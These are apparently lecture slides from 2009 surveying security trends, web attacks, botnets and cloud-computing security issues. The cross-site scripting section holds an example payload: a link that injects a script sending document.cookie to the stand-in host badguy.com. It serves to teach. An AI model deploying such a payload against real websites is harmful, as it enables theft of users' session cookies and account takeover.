Trends and Selected Topics in Security

Guo,Yuanxiong2009.11.27

Outline

• Overview of Security and Trends

• Three Selected Topics– Web Security– Botnet– Security in Cloud Computing

So Many Security Conferences and Experts but the reality is ………we are getting more and more unsecure!!!

Countries whose resources are used to host Malicious Programs in 2008 (From Kaspersky)

China was the absolute leader based on the number of attacks originating from resources located in the country!!!

Countries in which user are attacked in 2008(From Kaspersky)

It comes as no surprise that China is again in top place!!!

What is Security?

• Most of computer science is concerned with achieving desired behavior

• Security is concerned with preventing undesired behavior– Different way of thinking!– An enemy who is actively and maliciously tr

ying to circumvent any protective measures you put in place

Goals of Security

Prevention– Prevent attackers from violating security policy

Detection– Detect attackers’ violation of security policy

Recovery– Stop attack, assess and repair damage

Survivability– Continue to function correctly even if attack

succeeds

Components of Security

Confidentiality– Keeping data and resources hidden.

Integrity– Preventing unauthorized changes to data or

resources.

Availability– Enabling access to data and resources

Netwok Stacks

people

application

session

transport

network

data link

physical

IP

TCP

email, Web, NFS

RPC

802.11

Sendmail, FTP, NFS bugs, chosen-protocol and version-rollback attacks

SYN flooding, RIP attacks,sequence number prediction

IP smurfing and otheraddress spoofing attacks

RPC worms, portmapper exploits

WEP attacksRF

RF fingerprinting, DoS

Phishing attacks, usability

Research Methodology in the Society of Security• Mathematical Modeling: Machine Learning,

Date Mining, Game theory, Social Network Analysis, Graph Theory, Percolation Theory, Queuing Theory, ect…….

• System: Virtual Machine, Operating System, Complier, Programming Language, Software Engineering, Reverse Engineering, ect……

Topics in Security Research

• Important, Really Existent or Urgent to be Solved

• Three Selected Topics– Web Security– Botnet– Security in Cloud Computing

Web Security

Vulnerability Status: Web is ‘Winning’

Recent Website Security Statistics Report by WhiteHat Security Inc. (Nov. 12, 2009)

• 83% of websites have had at least one serious vulnerability

• 64% of websites currently have at least one serious vulnerability

• Web-based Attack is the mainstream

Web Application• Many sensitive tasks are done through web

– Online banking, online shopping– Database access– System administration

• Ease of detection and exploitation of web vulnerabilities

• Large number of low-grade software applications written by inexperienced developers

• Web applications and web users are targets of many attacks– Cross site scripting (XSS) (TOP 1 Threat)– SQL injection– Cross site request forgery– PHP Remote File Inclusion– Session hijacking– ect…..

Cross-Site Scripting Overview

16

Attack Server

Server Victim

User Victim

visit web site

receive malicious page

click on linkecho user input

1

2

3

send valuable data

5

4

17

The Setup

• User input is echoed into HTML response.

• Example: search field– http://victim.com/search.php ? term = apple

– search.php responds with:<HTML> <TITLE> Search Results </TITLE>

<BODY>

Results for <?php echo $_GET[term] ?> :

. . .

</BODY> </HTML>

• Is this exploitable?

18

Bad Input• Problem: no validation of input term

• Consider link: (properly URL encoded)http://victim.com/search.php ? term =

<script> window.open(“http://badguy.com?cookie = ”

+ document.cookie ) </script>

What if user clicks on this link?1. Browser goes to victim.com/search.php2. Victim.com returns

<HTML> Results for <script> … </script>3. Browser executes script:

Sends cookie for victim.com to badguy.com

19

So What?

• Why would user click on such a link?– Phishing email in webmail client (e.g. gmail).– Link in double-click banner ad … many many ways to fool user into clicking

• What if badguy.com gets cookie for victim.com ?

– Cookie can include session auth for victim.com

• Or other data intended only for victim.com

Violates same origin policy

20

Much Worse

• Attacker can execute arbitrary scripts in browser

• Can manipulate any DOM component on victim.com– Control links on page– Control form fields (e.g. password field) on this pag

e and linked pages.• Example: MySpace.com phishing attack injects

password field that sends password to bad guy.

Types of XSS vulnerabilities

• DOM-Based (local)– Problem exists within a page’s client-side script

• Non-persistent (“reflected”)– Data provided by a Web client is used by server-

side scripts to generate a page for that user

• Persistent (“stored”)– Data provided to an application is first stored

and later displayed to users in a Web page– Potentially more serious if the page is rendered

more than once

Botnet

• Bots: Autonomous programs performing tasks

• Botnets: group of bots

• Available for simultaneous control by bot masters

• A hybrid of many previous threats integrated with a command and control system.

• The root cause of a large number of security problems on the Internet.

Botnets

Botnet Statistics

• About 25% of all computers connected to the internet in the world are infected bots and controlled by attackers by estimation.

• Size: up to 1.4million nodes (a really bot army!!!)• 10 million bot computers were used to distribute

spam and malware across the Internet each day

• Honeypot: gather information– Run unpatched version of Windows– Usually infected within 10 minutes.

• Larger Damage: multiple computers grouped together to perform distributed attacks and bring down bigger targets.

• Hidden Attacker: attack packets are sent from the bot rather than directly from the attacker.

• Money!!!!!

Why Botnet is so attracting

Botnet Application

One Example of Botnet1. Attacker launches worm, virus, or o

ther mechanism to infect Windows machine.

2. Infected machines contact botnet controller via IRC.

3. Spammer (sponsor) pays Attacker for use of botnet.

4. Spammer uses botnet to send spam emails.

Current Botnet Research• Measuring the Botnet (Size, location, ect)

– Passive Analysis of Secondary effects caused by infected machine (Spam, DNS Query, ect).

– Infiltration: Join the botnet to perform analysis from the inside (Using Honeypot).

• Defending the Botnet– Cooperative Behaviors– Signatures– Attack Behaviors

Something New: Mobile Botnet (CCS 09’)

• The Attack Target: Home Location Register (HLR) - a massive database that stores the details of every SIM card an cellular network operator issues and would typically contain details on up to 5 million subscribers.

• Research result shows that a botnet of fewer than 12,000 infected cellphones could disrupt 93 per cent of traffic to a HLR of 1 million subscribers.

• World’s first iphone Virus Surfaces !!! (Nov. 2009)

Security Issues in Cloud Computing

A Frequent-asked Question:

• Is Cloud Computing just Reinventing of the wheel ?– Cluster Computing– Utility Computing– Software as a Service– Service Computing– ect……

• Still under debate, but the general consensus is that all those terms could be summarized by the umbrella of cloud computing

A Latest Working Definition (V15)

• ‘A pay-per-use model for enabling available, convenient and on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, services) that can be rapidly provisioned and released with minimal management effort or service provider interaction’ (From NIST)

• Promote availability and composed of five essential characteristics, three service models, and four deployment models.

Five Essential Characteristics

• On-demand self-service.

• Ubiquitous network access.

• Resource pooling

• Rapid elasticity

• Measured Service

Three Service Models

• Cloud Software as a Service– Use Provider’s applications over a network

• Cloud Platform as a Service– Deploy customer-created applications to a

Cloud

• Cloud Infrastructure as a Service– Rent processing, Storage, network capacity,

and other fundamental computing resources

Four Deployment Models

• Private cloud – Single enterprise owned

• Community cloud– Shared infrastructure for specific community

• Public cloud– Available to public and own by a

organization selling cloud services. • Hybrid cloud

– composition of two or more clouds

Benefits of Cloud Computing• Cost Savings

– Setting up and upgrade without huge expense for infrastructure purchase and maintenance, just pay-as-you-go.

• Immediacy– Provision and utilize a service in a single day,

compared to traditional IT projects– Agility of a business and reduction of the costs

with time delay• Availability

– The infrastructures of Cloud Provider are often powerful and have good load-balancing policy.

Benefits of Cloud Computing (Cont’)

• Scalability– On-demand provisioning and implementation,

allow for traffic peak. • Efficiency

– Shift maintenance activities to the cloud provider

– Focus efforts on innovation, research and development

• Resiliency– Back-up solution given by cloud providers in

disaster scenario

Security is the Major Issue

Research Topics

• Building Trust in the Cloud– Effects of different forms of breach reporting

on security– End-to-end data confidentiality in the cloud– Higher assurance clouds, Virtual Private Cloud,

ect. • Data Protection in Large-Scale Cross-Organization

Systems– Forensics and Evidence gathering mechanisms– Incident handling – monitoring and traceability– International differences in relevant regulations

including data protection and privacy

Research Topics (Cont’)

• Large Scale Computer Systems Engineering– Resource isolation mechanisms – data,

processing, memory, logs, ect– Interoperability between cloud providers– Resilience of cloud computing. How can cloud

improve resilience?

Current Findings

• It has been reported that on current cloud computing provider’s platform (Amazon EC2), Information Leakage can arise from sharing physical infrastructure between mutually distrustful users, even when their actions are isolated through machine virtualization as within a third-party cloud compute service.

• Many security problems need to be identified and solved before the age of Clouding computing to come !

Q&A